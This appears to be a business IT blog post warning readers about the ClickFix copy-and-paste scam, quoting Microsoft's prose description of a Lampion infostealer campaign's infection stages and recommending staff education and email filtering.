Organisations including Microsoft are warning how scammers are changing the way they steal our data.

The so-called Click Fix scam asks you to type in data rather than clicking on a link. It is feared that some computer users may see the action of typing in numbers – often by copying and pasting – is seen as safer than clicking on a link.

It may not be. Always think before you copy and paste a code to authenticate your status.

Microsoft say:

Over the past year, Microsoft Threat Intelligence and Microsoft Defender Experts have observed the ClickFix social engineering technique growing in popularity, with campaigns targeting thousands of enterprise and end-user devices globally every day. Since early 2024, we’ve helped multiple customers across various industries address such campaigns attempting to deliver payloads like the prolific Lumma Stealer malware. These payloads affect Windows and macOS devices and typically lead to information theft and data exfiltration.

The ClickFix technique attempts to trick users into running malicious commands on their devices by taking advantage of their target’s tendency to solve minor technical issues and other seemingly benign interactions, such as human verification and CAPTCHA checks.

It typically gives the users instructions that involve clicking prompts and copying, pasting, and running commands directly in the Windows Run dialog box, Windows Terminal, or Windows PowerShell.

This is often combined with delivery vectors such as phishing, malvertising, and drive-by compromises, most of which even impersonate legitimate brands and organizations to further reduce suspicion from their targets.

Because ClickFix relies on human intervention to launch the malicious commands, a campaign that uses this technique could get past conventional and automated security solutions. Organisations could thus reduce the impact of this technique by educating users in recognising its lures and by implementing policies that will harden the device configurations in their environment (for example, disallowing users to use the Run dialog if it’s not necessary in their daily tasks).

Microsoft Defender XDR also provides a comprehensive set of protection features that detect this threat at various stages of the attack chain.

A typical ClickFix attack begins with threat actors using phishing emails, malvertisements, or compromised websites to lead unsuspecting users to a visual lure—usually a landing page—and trick them into executing a malicious command themselves. By adding this user interaction element in the attack chain, a threat using the ClickFix technique could slip through conventional and automated security solutions.

A case study

To illustrate a typical ClickFix attack chain, let’s look at a campaign we first identified in May 2025 targeting Portuguese organizations in government, finance, and transportation sectors to deliver Lampion malware, an infostealer focused on banking information. This campaign has since been observed in other countries—including Portugal, Switzerland, Luxembourg, France, Hungary, and Mexico—targeting organizations in the government, education, transportation, and financial services industries. As of June 2025, this campaign remains active.

The Lampion malware campaign’s ClickFix lures, obfuscation methods, and multi-stage infection process are designed to evade detection:

1. The threat actor sends phishing emails containing a ZIP file, which when opened, contains an HTML file that redirects target users to a fake Portuguese tax authority site where the ClickFix lure is hosted.
2. The ClickFix lure tricks users into launching a PowerShell command that downloads an obfuscated VBScript (.vbs).
3. The downloaded script then writes a second obfuscated .vbs file to the Windows %TEMP% directory and schedules it to run later using a hidden task.
4. This second .vbs file downloads a third and much larger .vbs file that performs reconnaissance, checks for antivirus or sandbox environments, and sends system data to a command-and-control (C2) server.
5. The third script also creates a .cmd file in the Windows startup folder, naming it after the user’s hostname, and schedules a system restart.
6. After the device restarts, the .cmd file launches a large DLL through rundll32.exe and attempts to deliver the final payload.

It is recommended that companies educate staff about Click Fix scams. Above all, look carefully about what you copy and paste.

Microsoft says companies must check their email filtering systems – if you need advice on this, please contact us at UK Business IT.